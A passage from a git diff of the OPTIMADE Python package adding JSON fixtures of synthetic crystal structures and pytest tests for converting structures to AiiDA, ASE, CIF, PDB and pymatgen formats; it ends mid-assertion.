"A27B8C2D2E2FGH", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 3.6001175409341037, + 0, + 0 + ], + [ + 0, + 4.438478811675378, + 0 + ], + [ + 0, + 0, + 7.718814146224643 + ] + ], + "cartesian_site_positions": [ + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ], + [ + 0.8417172367979051, + 0.8417172367979051, + 0.8417172367979051 + ] + ], + "nsites": 44, + "species_at_sites": [ + "Ba", + "Ba", + "Ce", + "Ce", + "Fe", + "H", + "Na", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "Si", + "Si", + "Si", + "Si", + "Si", + "Si", + "Si", + "Si", + "Ti", + "Ti" + ], + "species": [ + { + "name": "Ba", + "chemical_symbols": [ + "Ba" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Ce", + "chemical_symbols": [ + "Ce" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Fe", + "chemical_symbols": [ + "Fe" + ], + "concentration": [ + 1 + ] + }, + { + "name": "H", + "chemical_symbols": [ + "H" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Na", + "chemical_symbols": [ + "Na" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Si", + "chemical_symbols": [ + "Si" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Ti", + "chemical_symbols": [ + "Ti" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ba-Ce-Fe-H-Na-O-Si-Ti" + } + }, + { + "id": "mpf_3819", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.945000", + "elements": [ + "Ba", + "F", + "H", + "Mn", + "Na", + "O", + "Re", + "Si", + "Ti" + ], + "nelements": 9, + "elements_ratios": [ + 0.045454545454545456, + 0.022727272727272728, + 0.022727272727272728, + 0.022727272727272728, + 0.022727272727272728, + 0.5909090909090909, + 0.045454545454545456, + 0.18181818181818182, + 0.045454545454545456 + ], + "chemical_formula_descriptive": "Ba2NaTi2MnRe2Si8HO26F", + "chemical_formula_reduced": "Ba2NaTi2MnRe2Si8HO26F", + "chemical_formula_anonymous": "A26B8C2D2E2FGHI", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 0.541264110585089, + 0, + 0 + ], + [ + 0, + 0.5211563701526833, + 0 + ], + [ + 0, + 0, + 4.063577553377723 + ] + ], + "cartesian_site_positions": [ + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ], + [ + 0.24056412649964642, + 0.24056412649964642, + 0.24056412649964642 + ] + ], + "nsites": 44, + "species_at_sites": [ + "Ba", + "Ba", + "F", + "H", + "Mn", + "Na", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "Re", + "Re", + "Si", + "Si", + "Si", + "Si", + "Si", + "Si", + "Si", + "Si", + "Ti", + "Ti" + ], + "species": [ + { + "name": "Ba", + "chemical_symbols": [ + "Ba" + ], + "concentration": [ + 1 + ] + }, + { + "name": "F", + "chemical_symbols": [ + "F" + ], + "concentration": [ + 1 + ] + }, + { + "name": "H", + "chemical_symbols": [ + "H" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Mn", + "chemical_symbols": [ + "Mn" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Na", + "chemical_symbols": [ + "Na" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Re", + "chemical_symbols": [ + "Re" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Si", + "chemical_symbols": [ + "Si" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Ti", + "chemical_symbols": [ + "Ti" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ba-F-H-Mn-Na-O-Re-Si-Ti" + }, + "relationships": { + "references": { + "data": [ + { + "id": "dummy/2019", + "type": "references" + } + ] + } + } + } +] \ No newline at end of file diff --git a/tests/adapters/structures/special_species.json b/tests/adapters/structures/special_species.json new file mode 100644 index 00000000..530aee1e --- /dev/null +++ b/tests/adapters/structures/special_species.json @@ -0,0 +1,140 @@ +[ + { + "id": "mpf_1", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.331000", + "elements": [ + "Ac" + ], + "nelements": 1, + "elements_ratios": [ + 1 + ], + "chemical_formula_descriptive": "Ac", + "chemical_formula_reduced": "Ac", + "chemical_formula_anonymous": "A", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 1.2503264826932692, + 0, + 0 + ], + [ + 0, + 9.888509716321765, + 0 + ], + [ + 0, + 0, + 0.2972637673241818 + ] + ], + "cartesian_site_positions": [ + [ + 0.17570227444196573, + 0.17570227444196573, + 0.17570227444196573 + ] + ], + "nsites": 1, + "species_at_sites": [ + "Ac" + ], + "species": [ + { + "name": "Ac", + "chemical_symbols": ["Ac", "vacancy"], + "concentration": [0.9, 0.1] + } + ], + "structure_features": ["disorder"], + "_exmpl_chemsys": "Ac" + }, + "relationships": { + "references": { + "data": [ + { + "id": "dijkstra1968", + "type": "references" + } + ] + } + } + }, + { + "id": "mpf_1", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.331000", + "elements": [ + "Ac" + ], + "nelements": 1, + "elements_ratios": [ + 1 + ], + "chemical_formula_descriptive": "Ac", + "chemical_formula_reduced": "Ac", + "chemical_formula_anonymous": "A", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 1.2503264826932692, + 0, + 0 + ], + [ + 0, + 9.888509716321765, + 0 + ], + [ + 0, + 0, + 0.2972637673241818 + ] + ], + "cartesian_site_positions": [ + [ + 0.17570227444196573, + 0.17570227444196573, + 0.17570227444196573 + ] + ], + "nsites": 1, + "species_at_sites": [ + "AcX" + ], + "species": [ + { + "name": "AcX", + "chemical_symbols": ["Ac", "X"], + "concentration": [0.9, 0.1] + } + ], + "structure_features": ["disorder"], + "_exmpl_chemsys": "AcX" + }, + "relationships": { + "references": { + "data": [ + { + "id": "dijkstra1968", + "type": "references" + } + ] + } + } + } +] \ No newline at end of file diff --git a/tests/adapters/structures/test_aiida.py b/tests/adapters/structures/test_aiida.py new file mode 100644 index 00000000..0f5ba9db --- /dev/null +++ b/tests/adapters/structures/test_aiida.py @@ -0,0 +1,62 @@ +# pylint: disable=import-error +import json +from pathlib import Path +import re +from typing import List + +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("aiida-core") +aiida = pytest.importorskip( + "aiida", + minversion=min_ver, + reason=f"aiida-core must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from aiida import load_profile + +load_profile() + +from aiida.orm import StructureData + +from optimade.models.structures import Periodicity + +from optimade.adapters import Structure +from optimade.adapters.exceptions import ConversionError +from optimade.adapters.structures.aiida import get_aiida_structure_data + + +def test_successful_conversion(RAW_STRUCTURES): + """Make sure its possible to convert""" + for structure in RAW_STRUCTURES: + assert isinstance(get_aiida_structure_data(Structure(structure)), StructureData) + + +def test_null_positions(null_position_structure): + """Make sure null positions are handled""" + assert isinstance(get_aiida_structure_data(null_position_structure), StructureData) + + +def test_null_lattice_vectors(null_lattice_vector_structure): + """Make sure null lattice vectors are handled""" + assert isinstance( + get_aiida_structure_data(null_lattice_vector_structure), StructureData + ) + + +def test_special_species(SPECIAL_SPECIES_STRUCTURES): + """Make sure vacancies and non-chemical symbols ("X") are handled""" + for special_structure in SPECIAL_SPECIES_STRUCTURES: + structure = Structure(special_structure) + + assert isinstance(get_aiida_structure_data(structure), StructureData) + + if "vacancy" in structure.attributes.species[0].chemical_symbols: + assert get_aiida_structure_data(structure).has_vacancies + assert not get_aiida_structure_data(structure).is_alloy + else: + assert not get_aiida_structure_data(structure).has_vacancies + assert get_aiida_structure_data(structure).is_alloy diff --git a/tests/adapters/structures/test_ase.py b/tests/adapters/structures/test_ase.py new file mode 100644 index 00000000..f55edfcc --- /dev/null +++ b/tests/adapters/structures/test_ase.py @@ -0,0 +1,53 @@ +# pylint: disable=import-error +import json +from pathlib import Path +import re +from typing import List + +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("ase") +ase = pytest.importorskip( + "ase", + minversion=min_ver, + reason=f"ase must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from ase import Atoms + +from optimade.models.structures import Periodicity + +from optimade.adapters import Structure +from optimade.adapters.exceptions import ConversionError +from optimade.adapters.structures.ase import get_ase_atoms + + +def test_successful_conversion(RAW_STRUCTURES): + """Make sure its possible to convert""" + for structure in RAW_STRUCTURES: + assert isinstance(get_ase_atoms(Structure(structure)), Atoms) + + +def test_null_positions(null_position_structure): + """Make sure null positions are handled""" + assert isinstance(get_ase_atoms(null_position_structure), Atoms) + + +def test_null_lattice_vectors(null_lattice_vector_structure): + """Make sure null lattice vectors are handled""" + assert isinstance(get_ase_atoms(null_lattice_vector_structure), Atoms) + + +def test_special_species(SPECIAL_SPECIES_STRUCTURES): + """Make sure vacancies and non-chemical symbols ("X") are handled""" + for special_structure in SPECIAL_SPECIES_STRUCTURES: + structure = Structure(special_structure) + + with pytest.raises( + ConversionError, + match="ASE cannot handle structures with partial occupancies", + ): + get_ase_atoms(structure) diff --git a/tests/adapters/structures/test_cif.py b/tests/adapters/structures/test_cif.py new file mode 100644 index 00000000..12061a29 --- /dev/null +++ b/tests/adapters/structures/test_cif.py @@ -0,0 +1,44 @@ +# pylint: disable=import-error +import json +from pathlib import Path +import re +from typing import List + +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("numpy") +numpy = pytest.importorskip( + "numpy", + minversion=min_ver, + reason=f"numpy must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from optimade.adapters import Structure +from optimade.adapters.structures.cif import get_cif + + +def test_successful_conversion(RAW_STRUCTURES): + """Make sure its possible to convert""" + for structure in RAW_STRUCTURES: + assert isinstance(get_cif(Structure(structure)), str) + + +def test_null_positions(null_position_structure): + """Make sure null positions are handled""" + assert isinstance(get_cif(null_position_structure), str) + + +def test_null_lattice_vectors(null_lattice_vector_structure): + """Make sure null lattice vectors are handled""" + assert isinstance(get_cif(null_lattice_vector_structure), str) + + +def test_special_species(SPECIAL_SPECIES_STRUCTURES): + """Make sure vacancies and non-chemical symbols ("X") are handled""" + for special_structure in SPECIAL_SPECIES_STRUCTURES: + structure = Structure(special_structure) + + assert isinstance(get_cif(structure), str) diff --git a/tests/adapters/structures/test_pdb.py b/tests/adapters/structures/test_pdb.py new file mode 100644 index 00000000..e4aed1f4 --- /dev/null +++ b/tests/adapters/structures/test_pdb.py @@ -0,0 +1,44 @@ +# pylint: disable=import-error +import json +from pathlib import Path +import re +from typing import List + +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("numpy") +numpy = pytest.importorskip( + "numpy", + minversion=min_ver, + reason=f"numpy must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from optimade.adapters import Structure +from optimade.adapters.structures.proteindatabank import get_pdb + + +def test_successful_conversion(RAW_STRUCTURES): + """Make sure its possible to convert""" + for structure in RAW_STRUCTURES: + assert isinstance(get_pdb(Structure(structure)), str) + + +def test_null_positions(null_position_structure): + """Make sure null positions are handled""" + assert isinstance(get_pdb(null_position_structure), str) + + +def test_null_lattice_vectors(null_lattice_vector_structure): + """Make sure null lattice vectors are handled""" + assert isinstance(get_pdb(null_lattice_vector_structure), str) + + +def test_special_species(SPECIAL_SPECIES_STRUCTURES): + """Make sure vacancies and non-chemical symbols ("X") are handled""" + for special_structure in SPECIAL_SPECIES_STRUCTURES: + structure = Structure(special_structure) + + assert isinstance(get_pdb(structure), str) diff --git a/tests/adapters/structures/test_pdbx_mmcif.py b/tests/adapters/structures/test_pdbx_mmcif.py new file mode 100644 index 00000000..6231baf6 --- /dev/null +++ b/tests/adapters/structures/test_pdbx_mmcif.py @@ -0,0 +1,44 @@ +# pylint: disable=import-error +import json +from pathlib import Path +import re +from typing import List + +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("numpy") +numpy = pytest.importorskip( + "numpy", + minversion=min_ver, + reason=f"numpy must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from optimade.adapters import Structure +from optimade.adapters.structures.proteindatabank import get_pdbx_mmcif + + +def test_successful_conversion(RAW_STRUCTURES): + """Make sure its possible to convert""" + for structure in RAW_STRUCTURES: + assert isinstance(get_pdbx_mmcif(Structure(structure)), str) + + +def test_null_positions(null_position_structure): + """Make sure null positions are handled""" + assert isinstance(get_pdbx_mmcif(null_position_structure), str) + + +def test_null_lattice_vectors(null_lattice_vector_structure): + """Make sure null lattice vectors are handled""" + assert isinstance(get_pdbx_mmcif(null_lattice_vector_structure), str) + + +def test_special_species(SPECIAL_SPECIES_STRUCTURES): + """Make sure vacancies and non-chemical symbols ("X") are handled""" + for special_structure in SPECIAL_SPECIES_STRUCTURES: + structure = Structure(special_structure) + + assert isinstance(get_pdbx_mmcif(structure), str) diff --git a/tests/adapters/structures/test_pymatgen.py b/tests/adapters/structures/test_pymatgen.py new file mode 100644 index 00000000..ee22823c --- /dev/null +++ b/tests/adapters/structures/test_pymatgen.py @@ -0,0 +1,63 @@ +# pylint: disable=import-error +import re +from typing import List + +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("pymatgen") +pymatgen = pytest.importorskip( + "pymatgen", + minversion=min_ver, + reason=f"pymatgen must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from pymatgen import Molecule, Structure as PymatgenStructure + +from optimade.models.structures import Periodicity + +from optimade.adapters import Structure +from optimade.adapters.structures.pymatgen import ( + get_pymatgen, + _get_structure, + _get_molecule, +) + + +def test_successful_conversion(RAW_STRUCTURES): + """Make sure its possible to convert""" + for structure in RAW_STRUCTURES: + assert isinstance( + get_pymatgen(Structure(structure)), (PymatgenStructure, Molecule) + ) + + +def test_successful_conversion_structure(structure): + """Make sure its possible to convert to pymatgen Structure""" + assert isinstance(_get_structure(structure), PymatgenStructure) + assert isinstance(get_pymatgen(structure), PymatgenStructure) + + +def test_null_lattice_vectors(null_lattice_vector_structure): + """Make sure null lattice vectors are handled + + This also respresents a test for successful conversion to pymatgen Molecule + """ + assert isinstance(_get_molecule(null_lattice_vector_structure), Molecule) + assert isinstance(get_pymatgen(null_lattice_vector_structure), Molecule) + + +def test_null_positions(null_position_structure): + """Make sure null positions are handled""" + assert isinstance(get_pymatgen(null_position_structure), PymatgenStructure) + assert isinstance(_get_structure(null_position_structure), PymatgenStructure) + assert isinstance(_get_molecule(null_position_structure), Molecule) + + +def test_special_species(SPECIAL_SPECIES_STRUCTURES): + """Make sure vacancies and non-chemical symbols ("X") are handled""" + for special_structure in SPECIAL_SPECIES_STRUCTURES: + structure = Structure(special_structure) + assert isinstance(get_pymatgen(structure), PymatgenStructure) diff --git a/tests/adapters/structures/test_structures.py b/tests/adapters/structures/test_structures.py new file mode 100644 index 00000000..d058d093 --- /dev/null +++ b/tests/adapters/structures/test_structures.py @@ -0,0 +1,144 @@ +import pytest + +from optimade.adapters import Structure +from optimade.models import StructureResource + +try: + import aiida + import ase + import numpy + import pymatgen +except ImportError: + all_modules_found = False +else: + all_modules_found = True + + +class TestStructure: + """Test Structure adapter""" + + def test_instantiate(self, RAW_STRUCTURES): + """Try instantiating Structure for all raw test structures""" + for structure in RAW_STRUCTURES: + new_Structure = Structure(structure) + assert isinstance(new_Structure.entry, StructureResource) + + def test_setting_entry(self, capfd, RAW_STRUCTURES): + """Make sure entry can only be set once""" + structure = Structure(RAW_STRUCTURES[0]) + structure.entry = RAW_STRUCTURES[1] + captured = capfd.readouterr() + assert "entry can only be set once and is already set." in captured.out + + def test_convert(self, structure): + """Test convert() works + Choose currently known entry type - must be updated if no longer available. + """ + if not structure._type_converters: + pytest.fail("_type_converters is seemingly empty. This should not be.") + + chosen_type = "cif" + if chosen_type not in structure._type_converters: + pytest.fail( + f"{chosen_type} not found in _type_converters: {structure._type_converters} - " + "please update test tests/adapters/structures/test_structures.py:TestStructure." + "test_convert()" + ) + + converted_structure = structure.convert(chosen_type) + assert isinstance(converted_structure, (str, None.__class__)) + assert converted_structure == structure._converted[chosen_type] + + def test_convert_wrong_format(self, structure): + """Test AttributeError is raised if format does not exist""" + nonexistant_format = 0 + right_wrong_format_found = False + while not right_wrong_format_found: + if str(nonexistant_format) not in structure._type_converters: + nonexistant_format = str(nonexistant_format) + right_wrong_format_found = True + else: + nonexistant_format += 1 + + with pytest.raises( + AttributeError, + match=f"Non-valid entry type to convert to: {nonexistant_format}", + ): + structure.convert(nonexistant_format) + + def test_getattr_order(self, structure): + """The order of getting an attribute should be: + 1. `as_<entry type format>` + 2. `<entry type attribute>` + 3. `<entry type attributes attributes>` + 4. `raise AttributeError` with custom message + """ + # If passing attribute starting with `as_`, it should call `self.convert()` + with pytest.raises( + AttributeError, match=f"Non-valid entry type to convert to: " + ): + structure.as_ + + # If passing valid StructureResource attribute, it should return said attribute + # Test also nested attributes with `getattr()`. + for attribute, attribute_type in ( + ("id", str), + ("species", list), + ("attributes.species", list), + ): + assert isinstance(getattr(structure, attribute), attribute_type) + + # Otherwise, it should raise AttributeError + for attribute in ("nonexistant_attribute", "attributes.nonexistant_attribute"): + with pytest.raises(AttributeError, match=f"Unknown attribute: {attribute}"): + getattr(structure, attribute) + + @pytest.mark.skipif( + all_modules_found, + reason="This test checks what happens if a conversion-dependent module cannot be found. " + "All could be found, i.e., it has no meaning.", + ) + def test_no_module_conversion(self, structure): + """Make sure a warnings is raised and None is returned for conversions with non-existing modules""" + import importlib + + CONVERSION_MAPPING = { + "aiida": ["aiida_structuredata"], + "ase": ["ase"], + "numpy": ["cif", "pdb", "pdbx_mmcif"], + "pymatgen": ["pymatgen"], + } + + modules_to_test = [] + for module in ("aiida", "ase", "numpy", "pymatgen"): + try: + importlib.import_module(module) + except (ImportError, ModuleNotFoundError): + modules_to_test.append(module) + + if not modules_to_test: + pytest.fail( + "No modules found to test - it seems all modules are installed." + ) + + for module in modules_to_test: + for conversion_function in CONVERSION_MAPPING[module]: + with pytest.warns( + UserWarning, match="not found, cannot convert structure to" + ): + converted_structure = structure.convert(conversion_function) + assert converted_structure is None + + def test_common_converters(self, raw_structure, RAW_STRUCTURES): + """Test common converters""" + structure = Structure(raw_structure) + + assert structure.as_json == StructureResource(**raw_structure).json() + assert structure.as_dict == StructureResource(**raw_structure).dict() + + # Since calling .dict() and .json() will return also all default-valued properties, + # the raw structure should at least be a sub-set of the resource's full list of properties. + for raw_structure in RAW_STRUCTURES: + raw_structure_property_set = set(raw_structure.keys()) + resource_property_set = set(Structure(raw_structure).as_dict.keys()) + assert raw_structure_property_set.issubset(resource_property_set) diff --git a/tests/adapters/structures/test_utils.py b/tests/adapters/structures/test_utils.py new file mode 100644 index 00000000..e4a7eb17 --- /dev/null +++ b/tests/adapters/structures/test_utils.py @@ -0,0 +1,138 @@ +import math + +import pytest + +from .utils import get_min_ver + +min_ver = get_min_ver("numpy") +numpy = pytest.importorskip( + "numpy", + minversion=min_ver, + reason=f"numpy must be installed with minimum version {min_ver} for these tests to" + " be able to run", +) + +from optimade.models import StructureResource + +from optimade.adapters.exceptions import ConversionError +from optimade.adapters.structures.utils import ( + _pad_iter_of_iters, + cell_to_cellpar, + fractional_coordinates, + pad_cell, + pad_positions, + scaled_cell, +) + + +# TODO: Add tests for cell_to_cellpar, unit_vector, cellpar_to_cell + + +def test_pad_positions(null_position_structure): + """Make sure None values in cartesian_site_positions are converted to padding float value""" + positions, padded_position = pad_positions( + null_position_structure.attributes.cartesian_site_positions + ) + + assert not any(value is None for vector in positions for value in vector) + assert padded_position + + positions, padded_position = pad_positions(positions) + + assert not any(value is None for vector in positions for value in vector) + assert not padded_position + + +def test_pad_cell(null_lattice_vector_structure): + """Make sure None values in lattice_vectors are converted to padding float value""" + lattice_vectors, padded_cell = pad_cell( + null_lattice_vector_structure.attributes.lattice_vectors + ) + + assert not any(value is None for vector in lattice_vectors for value in vector) + assert padded_cell + + lattice_vectors, padded_cell = pad_cell(lattice_vectors) + + assert not any(value is None for vector in lattice_vectors for value in vector) + assert not padded_cell + + +def test__pad_iter_of_iters(): + """Test _pad_iter_of_iters""" + iterable = [(0.0,) * 3, (0.0,) * 3, (None,) * 3] + + padded_iterable, padded_iterable_bool = pad_cell(iterable) + + assert padded_iterable_bool + assert all(math.isnan(_) for _ in padded_iterable[-1]) + for i in range(2): + assert padded_iterable[i] == (0.0,) * 3 + + for valid_padding_value in (3.0, 3, "3", "3.0"): + padded_iterable, padded_iterable_bool = pad_cell(iterable, valid_padding_value) + + assert padded_iterable_bool + assert padded_iterable[-1] == (float(valid_padding_value),) * 3 + for i in range(2): + assert padded_iterable[i] == (0.0,) * 3 + + # Since nan != nan, the above for-loop cannot be used for nan + valid_padding_value = "nan" + padded_iterable, padded_iterable_bool = pad_cell(iterable, valid_padding_value) + + assert padded_iterable_bool + assert all(math.isnan(_) for _ in padded_iterable[-1]) + assert all(math.isnan(_) for _ in (float(valid_padding_value),) * 3) + for i in range(2): + assert padded_iterable[i] == (0.0,) * 3 + + invalid_padding_value = "x" + padded_iterable, padded_iterable_bool = pad_cell(iterable, invalid_padding_value) + + assert padded_iterable_bool + assert all(math.isnan(_) for _ in padded_iterable[-1]) + for i in range(2): + assert padded_iterable[i] == (0.0,) * 3 + + +def test_scaled_cell_and_fractional_coordinates(structures): + """Make sure these two different calculations arrive at the same result""" + for structure in structures: + scale = scaled_cell(structure.lattice_vectors) + scale = numpy.asarray(scale) + cartesian_positions = numpy.asarray(structure.cartesian_site_positions) + scaled_fractional_positions = (scale.T @ cartesian_positions.T).T + for i in range(3): + scaled_fractional_positions[:, i] %= 1.0 + scaled_fractional_positions[:, i] %= 1.0 + scaled_fractional_positions = [ + tuple(position) for position in scaled_fractional_positions + ] + + calculated_fractional_positions = fractional_coordinates( + cell=structure.lattice_vectors, + cartesian_positions=structure.cartesian_site_positions, + ) + + for scaled_position, calculated_position in zip( + scaled_fractional_positions, calculated_fractional_positions + ): + assert scaled_position == pytest.approx(calculated_position) + + +def test_scaled_cell_consistency(structure): + """Test scaled_cell's PDB-designated validation: inverse of det(SCALE) = Volume of cell""" + # Manual calculation of volume = |a_1 . (a_2 x a_3)| + a_1 = structure.lattice_vectors[0] + a_2 = structure.lattice_vectors[1] + a_3 = structure.lattice_vectors[2] + a_mid_0 = a_2[1] * a_3[2] - a_2[2] * a_3[1] + a_mid_1 = a_2[2] * a_3[0] - a_2[0] * a_3[2] + a_mid_2 = a_2[0] * a_3[1] - a_2[1] * a_3[0] + volume_from_cellpar = abs(a_1[0] * a_mid_0 + a_1[1] * a_mid_1 + a_1[2] * a_mid_2) + + scale = scaled_cell(structure.lattice_vectors) + volume_from_scale = 1 / numpy.linalg.det(scale) + + assert volume_from_scale == 